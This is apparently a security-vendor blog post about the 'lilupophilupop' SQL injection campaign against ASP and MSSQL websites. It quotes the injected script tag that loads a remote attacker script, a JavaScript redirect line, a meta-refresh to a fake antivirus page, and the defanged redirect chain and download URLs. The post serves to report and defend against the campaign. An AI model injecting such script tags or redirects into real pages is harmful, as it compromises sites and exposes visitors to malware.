Per ISC diary, SQL injection attack against ASP website and MSSQL are happening. We can find the following string embedded in the web page of victim sites.

    ""></title><script src="hxxp://lilupophilupop.com/sl.php"></script>" 

 

(Figure 1: from ISC diary's comment)

The link inside the malicious "sl.php" changes often:

    window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");

But we know it will redirect to other hopping sites belong to IP address(194.28.114.102) :

  • hxxp://doutl31inesst.rr.nu
  • hxxp://rthur87seeks.rr.nu
  • hxxp://ift72hbot.rr.nu
  • and more...

And get the content as follows:

    <meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?nhyb3c0y=kt3ixnCYZ6msj93Z0KKljNrYsaifqJHi3OWfZpSWrtacpKCcm6WK" />

Finally, you will see the fake AV scanning page(Figure 2) and lure people to download the installer, the detection rate is rarely low about 16%.

 

(Figure 2) 

The detailed attacking paths are as follows:

[script] hxxp://lilupophilupop.com/sl.php

      [hop] hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl

      [hop] hxxp://www3.simplerfnetwork.rr.nu

      [hop] hxxp://www1.smartscanerjkm.rr.nu

          [download] hxxp://www1.smartscanerjkm.rr.nu

 

Detection rate in VirusTotal (7/43): 

 

Since 02/12/2011,  AegisLab WebGuard can block these malicious sites. 

By AegisLab